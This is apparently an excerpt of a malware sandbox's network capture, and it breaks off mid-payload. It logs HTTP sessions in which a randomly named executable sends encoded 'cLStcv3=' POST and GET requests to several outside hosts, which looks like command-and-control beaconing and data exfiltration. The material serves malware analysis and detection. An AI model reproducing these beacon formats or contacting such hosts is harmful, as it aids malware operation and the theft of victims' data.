Aug 29, 2024 12:25:15.455517054 CEST	589	OUT	GET /m3ft/?cLStcv3=mm8fgD9+jitkhgs161OZt8fCms83PFFT8XhsXaqjQsukr7/M7pRfQgp4Nt/ggm/XryzwVs+W+lrB4JMnarTnzCQZM7KWEo1HwHoI3FMw782O73yIdszacYliHArJfGfO1B1Ji3g=&oLy=-hKdflfxw6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.fimgroup.net User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Aug 29, 2024 12:25:16.115962029 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 29 Aug 2024 10:25:15 GMT Connection: close Content-Length: 5112 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Aug 29, 2024 12:25:16.115983009 CEST	224	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
Aug 29, 2024 12:25:16.115992069 CEST	1236	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
Aug 29, 2024 12:25:16.116003990 CEST	224	IN	Data Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely caus
Aug 29, 2024 12:25:16.116050959 CEST	1236	IN	Data Raw: 65 73 3a 3c 2f 68 34 3e 20 0a 20 20 3c 75 6c 3e 20 09 3c 6c 69 3e 54 68 65 20 64 69 72 65 63 74 6f 72 79 20 6f 72 20 66 69 6c 65 20 73 70 65 63 69 66 69 65 64 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 6f 6e 20 74 68 65 20 57 65 62 20 73 65 Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
Aug 29, 2024 12:25:16.116060972 CEST	224	IN	Data Raw: 64 65 74 61 69 6c 73 2d 72 69 67 68 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>   http://www.fimgroup.net:80/m3ft/?cLStcv3=mm8fgD9+jitkhgs161OZt8fCms83PFFT8XhsXaqjQsukr7/
Aug 29, 2024 12:25:16.116072893 CEST	951	IN	Data Raw: 4d 37 70 52 66 51 67 70 34 4e 74 2f 67 67 6d 2f 58 72 79 7a 77 56 73 2b 57 2b 6c 72 42 34 4a 4d 6e 61 72 54 6e 7a 43 51 5a 4d 37 4b 57 45 6f 31 48 77 48 6f 49 33 46 4d 77 37 38 32 4f 37 33 79 49 64 73 7a 61 63 59 6c 69 48 41 72 4a 66 47 66 4f 31 Data Ascii: M7pRfQgp4Nt/ggm/XryzwVs+W+lrB4JMnarTnzCQZM7KWEo1HwHoI3FMw782O73yIdszacYliHArJfGfO1B1Ji3g=&oLy=-hKdflfxw6</td></tr> <tr><th>Physical Path</th><td>   D:\inetpub\wwwroot\m3ft\</td></tr> <tr class="alt"><th>Logon Metho

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49746	18.162.124.14	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:29.670027018 CEST	838	OUT	POST /gzjk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.6rkdm.top Origin: http://www.6rkdm.top Referer: http://www.6rkdm.top/gzjk/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 56 42 4e 74 41 58 76 72 73 77 6c 6a 39 30 30 30 79 66 55 61 54 6b 56 69 58 44 7a 43 75 54 4b 37 6d 41 4d 46 62 57 32 63 6c 48 53 37 45 6c 48 65 46 42 73 47 65 41 37 34 52 6f 4d 68 74 44 45 6a 4d 63 44 30 61 6a 6a 37 57 4d 61 5a 4a 54 4b 44 6e 4e 6d 6e 42 53 4b 61 53 55 6c 52 53 4e 52 4a 4d 77 6f 4e 61 41 64 4b 2b 39 6c 2f 4b 51 6e 59 4a 58 64 2b 2b 38 55 53 49 77 75 34 38 70 37 66 43 34 6c 77 77 65 4d 48 78 77 2b 5a 32 35 6d 36 78 50 7a 53 59 33 31 47 31 31 56 4f 51 79 43 41 66 4f 4a 2b 5a 6a 58 56 6a 72 6a 74 42 38 4b 32 42 50 79 47 4d 4d 46 38 6b 36 34 55 72 59 6a 55 65 2b 42 35 61 5a 48 6a 4f 30 78 59 Data Ascii: cLStcv3=VBNtAXvrswlj9000yfUaTkViXDzCuTK7mAMFbW2clHS7ElHeFBsGeA74RoMhtDEjMcD0ajj7WMaZJTKDnNmnBSKaSUlRSNRJMwoNaAdK+9l/KQnYJXd++8USIwu48p7fC4lwweMHxw+Z25m6xPzSY31G11VOQyCAfOJ+ZjXVjrjtB8K2BPyGMMF8k64UrYjUe+B5aZHjO0xY
Aug 29, 2024 12:25:30.544399023 CEST	771	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 29 Aug 2024 10:25:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"6692a6ec-35f" Content-Encoding: gzip Data Raw: 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 93 dd 6e d3 30 18 86 8f 8b c4 3d 84 70 ba 36 05 36 a9 45 4e 10 27 3b de 2d b8 a9 ab 44 ca 1f a9 db d0 b3 6e 53 37 aa 74 dd 40 63 42 5b 26 c4 18 63 08 01 1d 3f a2 74 29 5c 0c b5 9b 1c ed 16 70 12 b3 15 a8 c8 41 2c bf 7e fd 7d cf eb c4 e0 46 d5 56 71 cb 41 82 86 4d 43 b9 7e 0d 5c 8e 08 56 d9 98 03 26 c2 50 b0 a0 89 64 d1 b5 2b 36 ae 8b 82 6a 5b 18 59 58 16 2d 1b ba aa a6 37 91 f8 b7 b5 a9 23 cf b1 5d 3c 63 f6 f4 2a d6 e4 2a 6a ea 2a ca a7 93 05 41 b7 74 ac 43 23 5f 57 a1 81 e4 5b 85 e2 82 60 32 cd 6c 98 5c 2a 16 96 98 04 1f ce 48 b7 13 57 a3 8e dc 74 0e 2b 4c 6a 21 46 25 25 d8 29 82 aa 41 b7 8e 58 cb 06 ae e5 4b 09 1b c0 3a 36 90 42 83 36 dd 1b 44 af 37 e2 a3 c7 40 ca 34 b6 28 f1 b0 a0 62 57 5b 49 92 5c 0e 38 0a d0 16 15 45 61 8b 8b ec e5 a4 01 33 11 d4 58 24 96 cb b0 5d 59 bc b9 bc 5c 64 8f f8 47 ed 8b 70 1f 48 89 eb 9f ed 50 d0 5c 54 93 35 8c 9d bb 92 e4 79 5e a1 a5 3d 80 8e 53 50 6d 53 ba 77 a7 5c 2e 95 d2 1e ff 33 f0 9a 90 d7 e5 54 93 e1 68 32 da a0 [TRUNCATED] Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c*jAtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,\|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49747	18.162.124.14	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:32.222975969 CEST	862	OUT	POST /gzjk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.6rkdm.top Origin: http://www.6rkdm.top Referer: http://www.6rkdm.top/gzjk/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 56 42 4e 74 41 58 76 72 73 77 6c 6a 38 56 45 30 31 38 38 61 62 6b 56 68 63 6a 7a 43 31 6a 4b 2f 6d 41 41 46 62 58 79 4d 69 78 69 37 45 46 33 65 45 41 73 47 5a 41 37 34 62 49 4d 67 6a 6a 45 71 4d 63 48 38 61 68 33 37 57 4d 4f 5a 4a 53 61 44 6d 36 79 6b 4f 69 4b 59 5a 30 6c 58 52 39 52 4a 4d 77 6f 4e 61 41 35 77 2b 35 4a 2f 4a 6c 76 59 49 31 31 78 39 38 55 54 50 77 75 34 34 70 36 55 43 34 6c 57 77 66 51 68 78 79 32 5a 32 34 57 36 78 39 62 52 53 33 31 41 78 31 55 6e 64 41 54 63 51 4f 67 4f 52 77 50 59 79 61 2f 51 45 4b 4c 73 64 38 79 6c 65 63 6c 2b 6b 34 67 6d 72 34 6a 2b 63 2b 35 35 49 4f 4c 45 42 41 55 37 43 68 36 54 6c 49 43 43 2f 63 67 39 70 75 59 57 77 43 59 73 4c 51 3d 3d Data Ascii: cLStcv3=VBNtAXvrswlj8VE0188abkVhcjzC1jK/mAAFbXyMixi7EF3eEAsGZA74bIMgjjEqMcH8ah37WMOZJSaDm6ykOiKYZ0lXR9RJMwoNaA5w+5J/JlvYI11x98UTPwu44p6UC4lWwfQhxy2Z24W6x9bRS31Ax1UndATcQOgORwPYya/QEKLsd8ylecl+k4gmr4j+c+55IOLEBAU7Ch6TlICC/cg9puYWwCYsLQ==
Aug 29, 2024 12:25:33.110171080 CEST	771	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 29 Aug 2024 10:25:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"6692a6ec-35f" Content-Encoding: gzip Data Raw: 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 93 dd 6e d3 30 18 86 8f 8b c4 3d 84 70 ba 36 05 36 a9 45 4e 10 27 3b de 2d b8 a9 ab 44 ca 1f a9 db d0 b3 6e 53 37 aa 74 dd 40 63 42 5b 26 c4 18 63 08 01 1d 3f a2 74 29 5c 0c b5 9b 1c ed 16 70 12 b3 15 a8 c8 41 2c bf 7e fd 7d cf eb c4 e0 46 d5 56 71 cb 41 82 86 4d 43 b9 7e 0d 5c 8e 08 56 d9 98 03 26 c2 50 b0 a0 89 64 d1 b5 2b 36 ae 8b 82 6a 5b 18 59 58 16 2d 1b ba aa a6 37 91 f8 b7 b5 a9 23 cf b1 5d 3c 63 f6 f4 2a d6 e4 2a 6a ea 2a ca a7 93 05 41 b7 74 ac 43 23 5f 57 a1 81 e4 5b 85 e2 82 60 32 cd 6c 98 5c 2a 16 96 98 04 1f ce 48 b7 13 57 a3 8e dc 74 0e 2b 4c 6a 21 46 25 25 d8 29 82 aa 41 b7 8e 58 cb 06 ae e5 4b 09 1b c0 3a 36 90 42 83 36 dd 1b 44 af 37 e2 a3 c7 40 ca 34 b6 28 f1 b0 a0 62 57 5b 49 92 5c 0e 38 0a d0 16 15 45 61 8b 8b ec e5 a4 01 33 11 d4 58 24 96 cb b0 5d 59 bc b9 bc 5c 64 8f f8 47 ed 8b 70 1f 48 89 eb 9f ed 50 d0 5c 54 93 35 8c 9d bb 92 e4 79 5e a1 a5 3d 80 8e 53 50 6d 53 ba 77 a7 5c 2e 95 d2 1e ff 33 f0 9a 90 d7 e5 54 93 e1 68 32 da a0 [TRUNCATED] Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c*jAtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,\|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49748	18.162.124.14	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:34.772934914 CEST	1875	OUT	POST /gzjk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.6rkdm.top Origin: http://www.6rkdm.top Referer: http://www.6rkdm.top/gzjk/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 56 42 4e 74 41 58 76 72 73 77 6c 6a 38 56 45 30 31 38 38 61 62 6b 56 68 63 6a 7a 43 31 6a 4b 2f 6d 41 41 46 62 58 79 4d 69 78 71 37 46 32 50 65 45 6e 34 47 59 41 37 34 59 49 4d 6c 6a 6a 46 36 4d 59 6a 34 61 68 36 4f 57 4f 32 5a 4a 77 43 44 75 6f 4b 6b 5a 79 4b 59 57 55 6c 57 53 4e 52 35 4d 30 4d 4a 61 41 4a 77 2b 35 4a 2f 4a 6b 66 59 59 58 64 78 37 38 55 53 49 77 75 43 38 70 36 38 43 35 4e 6f 77 66 56 61 78 44 57 5a 33 59 47 36 33 65 7a 52 49 33 31 43 38 56 55 2f 64 41 66 31 51 49 46 2f 52 7a 53 7a 79 59 6a 51 47 2b 57 32 4e 49 43 67 44 2b 6c 68 36 4c 41 41 73 6f 36 50 53 2b 64 43 59 38 2f 78 65 78 77 6c 4e 52 2b 72 6d 5a 62 74 38 74 77 4c 6a 75 4a 36 6c 54 64 58 57 4c 78 49 5a 2f 50 79 41 70 53 4c 55 66 42 45 4c 68 67 63 45 4e 6c 4d 47 54 66 74 68 61 31 44 7a 43 70 5a 68 49 37 6a 4c 4f 66 30 56 76 67 47 52 71 6c 62 48 6f 62 32 34 2f 58 48 51 2f 4d 34 35 44 34 38 63 54 4b 36 41 46 2f 7a 4d 49 30 51 73 6e 6b 33 4b 58 35 44 63 65 63 52 49 69 62 71 6a 2f 6e 57 48 55 69 42 38 58 [TRUNCATED] Data Ascii: cLStcv3=VBNtAXvrswlj8VE0188abkVhcjzC1jK/mAAFbXyMixq7F2PeEn4GYA74YIMljjF6MYj4ah6OWO2ZJwCDuoKkZyKYWUlWSNR5M0MJaAJw+5J/JkfYYXdx78USIwuC8p68C5NowfVaxDWZ3YG63ezRI31C8VU/dAf1QIF/RzSzyYjQG+W2NICgD+lh6LAAso6PS+dCY8/xexwlNR+rmZbt8twLjuJ6lTdXWLxIZ/PyApSLUfBELhgcENlMGTftha1DzCpZhI7jLOf0VvgGRqlbHob24/XHQ/M45D48cTK6AF/zMI0Qsnk3KX5DcecRIibqj/nWHUiB8X+STebH2LYALLpCA8Yejm9CcpPpkYV0YvMdJ3+ubXneHwcdsSNmFgweAOYssdTePBVxlWEoczyRFqraS6txbYfetEsKTNeUHeqXZZ/7SZkQlp19wdSBFkgiw5xyk4N5jmXsk3CgcjAEL1Kw1EoPwE7pb6zBU2gQmgRNzt3MoJd1vbpcwTAzUPHZ8u9+brPE1P5EpOFMMvKUCPXJ0hTyrZKJc3eWaOlD22hF5nkUwRIZAiRCkTjBBTQfeQdLqdHSsS3p0TxQOXOB95iCcsewaUMvxOGxy0aeztti+dteW5Bufy1R8SvsRpYNV9tEdjHMGbXZHDUSz1aspFAmmKBCWKAgF5Rhk8CrRXfi3K+EMa5eEG4vgva+DjFMJgcT81Otk4/VGlawFpW/1jWwN5V2wZfPTtN05zR29HF2k4djIvjbe3KCWvb32Eao/hbUl2W5cGKZw+NSP5vdr963HIgZPE4C6ofyNbbm1QSZQKA312uVXicAGKmzYzLUu7ON/XjdP9wexCI+r7NWRA/cx2QCxhORqwcpRxyPIN/utFtvFkU6WAPNltp+m/rucaY92DYH7s8fKb4u5Wx1UKngiDvxpaeTulipOIAu7LpXFv+aeq5sMYpjxSpjV00gODQ8Gokls+HxPVTM0R3rCHKpABpTYZSOIhhOX+BpfRi+ [TRUNCATED]
Aug 29, 2024 12:25:35.641884089 CEST	771	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 29 Aug 2024 10:25:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"6692a6ec-35f" Content-Encoding: gzip Data Raw: 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 93 dd 6e d3 30 18 86 8f 8b c4 3d 84 70 ba 36 05 36 a9 45 4e 10 27 3b de 2d b8 a9 ab 44 ca 1f a9 db d0 b3 6e 53 37 aa 74 dd 40 63 42 5b 26 c4 18 63 08 01 1d 3f a2 74 29 5c 0c b5 9b 1c ed 16 70 12 b3 15 a8 c8 41 2c bf 7e fd 7d cf eb c4 e0 46 d5 56 71 cb 41 82 86 4d 43 b9 7e 0d 5c 8e 08 56 d9 98 03 26 c2 50 b0 a0 89 64 d1 b5 2b 36 ae 8b 82 6a 5b 18 59 58 16 2d 1b ba aa a6 37 91 f8 b7 b5 a9 23 cf b1 5d 3c 63 f6 f4 2a d6 e4 2a 6a ea 2a ca a7 93 05 41 b7 74 ac 43 23 5f 57 a1 81 e4 5b 85 e2 82 60 32 cd 6c 98 5c 2a 16 96 98 04 1f ce 48 b7 13 57 a3 8e dc 74 0e 2b 4c 6a 21 46 25 25 d8 29 82 aa 41 b7 8e 58 cb 06 ae e5 4b 09 1b c0 3a 36 90 42 83 36 dd 1b 44 af 37 e2 a3 c7 40 ca 34 b6 28 f1 b0 a0 62 57 5b 49 92 5c 0e 38 0a d0 16 15 45 61 8b 8b ec e5 a4 01 33 11 d4 58 24 96 cb b0 5d 59 bc b9 bc 5c 64 8f f8 47 ed 8b 70 1f 48 89 eb 9f ed 50 d0 5c 54 93 35 8c 9d bb 92 e4 79 5e a1 a5 3d 80 8e 53 50 6d 53 ba 77 a7 5c 2e 95 d2 1e ff 33 f0 9a 90 d7 e5 54 93 e1 68 32 da a0 [TRUNCATED] Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c*jAtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,\|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49750	18.162.124.14	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:37.317598104 CEST	586	OUT	GET /gzjk/?cLStcv3=YDlNDhHByhlf6nQelagaT3FTRjXu5jrNjAd5ZmuDrGe9JGDYJAs2Uym5b/cCl1RiDZ+iQgyIXf65KlrikbfSKljvf01yS/1iDTwvEAEyzsoYMlH0K0Blq6hvBg/o1tysCZp8w58=&oLy=-hKdflfxw6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.6rkdm.top User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Aug 29, 2024 12:25:38.203598976 CEST	1051	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 29 Aug 2024 10:25:38 GMT Content-Type: text/html Content-Length: 863 Connection: close Vary: Accept-Encoding ETag: "6692a6ec-35f" Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 30 2e 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e e6 9c 80 e6 96 b0 e8 a7 86 e9 a2 91 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 09 09 09 3c 70 3e 3c 68 34 3e 3e 3e 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 09 3c 70 3e 3c 68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e6 9c 80 e6 96 b0 e8 [TRUNCATED] Data Ascii: <!doctype html><html><head><meta name="robots" content="noarchive"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" /><meta charset="utf-8"><title></title></head><body><p><h4>>></h4></p><p><h4><font color="#FF0000"></font></h4></p><p><a href=http://www.yhqapp.com/?39988><h4>http://www.yhqapp.com/?39988</h4></a></p><p><h4></h4></p><p><h4><font color="#009900">APP</font><font color="#FF0000"></font></h4></p><p><h4><font color="#FF0000"></font><h4></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49751	65.21.196.90	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:43.324671984 CEST	850	OUT	POST /jpse/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.030002721.xyz Origin: http://www.030002721.xyz Referer: http://www.030002721.xyz/jpse/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 58 53 6f 66 6c 45 34 49 46 77 6f 67 42 77 6e 55 38 44 54 36 42 37 52 35 34 2f 63 79 70 48 6e 45 54 77 66 6c 37 77 7a 73 37 2b 54 76 7a 44 48 47 58 69 49 45 4b 74 58 7a 62 57 4f 46 67 59 54 41 44 54 66 4f 50 47 